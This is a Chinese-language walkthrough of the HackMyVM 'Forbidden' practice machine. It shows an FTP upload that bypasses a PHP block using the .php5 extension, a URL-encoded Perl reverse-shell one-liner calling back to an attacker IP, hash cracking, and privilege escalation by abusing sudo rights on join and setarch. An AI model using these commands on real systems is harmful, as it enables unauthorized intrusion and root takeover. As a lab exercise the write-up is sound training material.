10.Forbidden

dg-publish:
  - "true"
tags:
  - HMV
  - sudo提权
  - hash爆破
难度: ⭐️⭐️
作者: sml
系统: Linux

1. 基本信息^toc

靶机链接：https://hackmyvm.eu/machines/machine.php?vm=Forbidden

作者：sml

难度：⭐️⭐️

知识点：SUDO提权（join、setarch）、hash爆破

2. 信息收集

端口扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -sS 192.168.9.12 -p 1-65535 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 12:38 CST
Nmap scan report for 192.168.9.12
Host is up (0.000056s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 08:00:27:2E:11:DB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.76 seconds

先看网站

意思是说Php被禁用了。不让用php

且给我们说了管理员用户的名字 marta

ftp登录

ftp尝试匿名登录发现需要给出密码

我猜测就是管理员的名字 Marta

成功登录

ftp 192.168.9.12        
Connected to 192.168.9.12.
220 (vsFTPd 3.0.3)
Name (192.168.9.12:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||5154|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Oct 09  2020 www

查看www目录

ftp> ls
229 Entering Extended Passive Mode (|||21476|)
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0             241 Oct 09  2020 index.html
-rwxrwxrwx    1 0        0              75 Oct 09  2020 note.txt
-rwxrwxrwx    1 0        0              10 Oct 09  2020 robots.txt

┌──(root㉿kali)-[/home/kali]
└─# cat robots.txt  
/note.txt
                                                                                                               
┌──(root㉿kali)-[/home/kali]
└─# cat note.txt  
The extra-secured .jpg file contains my password but nobody can obtain it.
                                                                                                               
┌──(root㉿kali)-[/home/kali]
└─# cat index.html 
<h1>SECURE WEB/FTP<h1>

Hi, Im the best admin of the world.
You cannot execute .php code on this server so you cannot
obtain a reverse shell. Not sure if its misconfigured another things... but
the importart is that php is disabled.

-marta

就是说他把他的密码放到了一个jpg文件里面

3. 目录扫描

这里没必要扫目录了。因为我们ftp连接上去的就是网站目录

这里扫一下udp服务

看有没有其他开发的udp端口

┌──(root㉿kali)-[/home/kali]
└─# nmap -sU 192.168.9.12  -p 1-100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 12:56 CST
Nmap scan report for 192.168.9.12
Host is up (0.00058s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:2E:11:DB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 114.69 seconds

也没有什么东西

根据首页的提示说Php配置可能会有突破口。

绕过Php不断修改php后缀名

Php|php2|php3|php4|php5|php6|php7|pht|phtm|phtml

发现.php5可以被解析

直接弹shell

perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.9.3%22%3B%24p%3D1122%3Bsocket%28S%2CPF\_INET%2CSOCK\_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr\_in%28%24p%2Cinet\_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%7D%3B%27

4. 提权

(remote) www-data@forbidden:/tmp$ find / -perm -4000 2>/dev/null
/home/marta/.forbidden
/usr/bin/mount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/su
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
(remote) www-data@forbidden:/tmp$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

执行这个文件后获取到了markos的用户权限

这是.forbidden文件逆向后的代码

5. 再次提权

获取到markos的权限后，看一下sudo -l 发现没有什么东西

之前有提示密码常在.jpg里面

直接找一下当前用户可以访问的jpg文件

find / -name \*.jpg
/var/www/html/TOPSECRETIMAGE.jpg

只有这一张图片是可以访问的

应该就是一个misc问题了

试了几种解法发现不对

可能文件名字就是密码

密码就是TOPSECRETIMAGE

markos@forbidden:~/html$ su marta
Password: 
marta@forbidden:/var/www/html$ sudo -l
Matching Defaults entries for marta on forbidden:
    env\_reset, mail\_badpass, secure\_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marta may run the following commands on forbidden:
    (ALL : ALL) NOPASSWD: /usr/bin/join

join读文件

 marta@forbidden:/var/www/html$ sudo join -a 2 /dev/null /root/root.txt
HMVmymymymymind

也可以用join读取peter用户的密码hash 然后用hashcat进行爆破

peter用户的密码是boomer

6. peter提权root

peter@forbidden:/var/www/html$ sudo -l
Matching Defaults entries for peter on forbidden:
    env\_reset, mail\_badpass, secure\_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on forbidden:
    (ALL : ALL) NOPASSWD: /usr/bin/setarch

peter@forbidden:/var/www/html$ sudo setarch x86\_64 /bin/bash
root@forbidden:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@forbidden:/var/www/html#

7. 拓展

造成Php5后缀可以被解析的原因是

/etc/nginx/sites-available/default 中配置了

location ~ \.php5$ {
                include snippets/fastcgi-php.conf;